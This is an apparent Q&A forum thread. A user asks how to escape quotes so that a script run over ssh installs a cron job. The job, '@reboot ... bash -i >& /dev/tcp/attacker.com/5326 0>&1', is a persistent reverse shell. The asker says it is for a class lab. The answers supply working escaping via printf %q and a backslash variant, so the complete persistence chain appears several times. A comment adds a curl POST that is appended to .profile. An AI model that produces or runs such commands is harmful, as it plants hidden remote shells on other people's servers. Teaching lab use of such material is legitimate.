-2

I have a script to update the cron job in a remote server accessed by ssh. I can't get the single quote to be put into the cron job from the echo command running in my bash script.

This is the exact string I need in my cron job:

'bash -i >& /dev/tcp/attacker.com/5326 0>&1'

But I can't get them to "stick."

This is the line in my script (other lines are working just fine.

sshpass -p 'PASSWORD' ssh -t -o StrictHostKeyChecking=no REMOTEUSERNAME@HOSTNAME "rm TEMPFILENAME;touch TEMPFILENAME;crontab -l > TEMPFILENAME;echo @reboot /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1' >> TEMPFILENAME; crontab TEMPFILENAME"

The result of this attempt is ...

@reboot /bin/bash -c bash -i >& /dev/tcp/attacker.com/5326 0>&1

... with the quotes missing.

I have tried multiple double quotes. Single quotes within double quotes. Slashes.

In this situatation how can put single quotes in my script so they end up on the cron job?

C0ntr07
  • 51
  • 1
  • 1
  • 9

2 Answers2

0

If you don't need it to be pretty, you can ask Bash to do it:

#!/bin/bash
cmd='bash -i >& /dev/tcp/attacker.com/5326 0>&1';
crontab=$(printf "@reboot bash -c %q" "$cmd")
echo=$(printf "echo %q >> TEMPFILENAME" "$crontab")
ssh=$(printf "ssh localhost %q" "$echo")
printf 'The command to run is:\n%s\n' "$ssh"

The output of this script is:

The command to run is:
ssh localhost echo\ @reboot\\\ bash\\\ -c\\\ bash\\\\\\\ -i\\\\\\\ \\\\\\\>\\\\\\\&\\\\\\\ /dev/tcp/attacker.com/5326\\\\\\\ 0\\\\\\\>\\\\\\\&1\ \>\>\ TEMPFILENAME

And indeed, if you copy-paste that command, you will find a file TEMPFILENAME containing:

@reboot bash -c bash\ -i\ \>\&\ /dev/tcp/attacker.com/5326\ 0\>\&1

Which in turn when copy pasted into a prompt will set up the reverse shell.

that other guy
  • 116,971
  • 11
  • 170
  • 194
  • Thanks! I’ll give this a try tonight since I have to run this Lab tomorrow with my class. – C0ntr07 Apr 15 '19 at 21:37
  • THANK YOU. I've been trying to understand the %q control and find less than optimal documentation. So now I'm lost when I need to execute `echo "curl -X POST -H "Content-Type: application/json" -d '{"value1":"PHONENUMBER","value2":"MESSAGE"}' https://maker.ifttt.com/trigger/TRIGGER/with/key/KEY &> /dev/null" >> .profile` in a script. Are there logical breakpoints I should be considering to break up the command before using `printf`? What should I be considering for `"` and `'`? – C0ntr07 May 06 '19 at 11:44
-1

Can you try after escaping the single quotes with a '\' ?

sshpass -p 'PASSWORD' ssh -t -o StrictHostKeyChecking=no REMOTEUSERNAME@HOSTNAME "rm TEMPFILENAME;touch TEMPFILENAME;crontab -l > TEMPFILENAME;echo @reboot /bin/bash -c \'bash -i >& /dev/tcp/attacker.com/5326 0>&1\' >> TEMPFILENAME; crontab TEMPFILENAME"
BlackPearl
  • 1,662
  • 1
  • 8
  • 16
  • 1
    Well, that's a good question - can you explain what "this" does and why you think that it might solve the problem? Keep in mind that such an explanation helps others to learn from your answer – Nico Haase Mar 31 '19 at 20:17
  • Sadly, this doesn't work. I am completely _flumuxed_ by this. By the way `\'` didn't work, neither did `'\'`and `'\"` was no good. I also tried `"\'"` along with `'\"` as well as `\''`. I'm willing to try all ideas anyone has. – C0ntr07 Mar 31 '19 at 21:00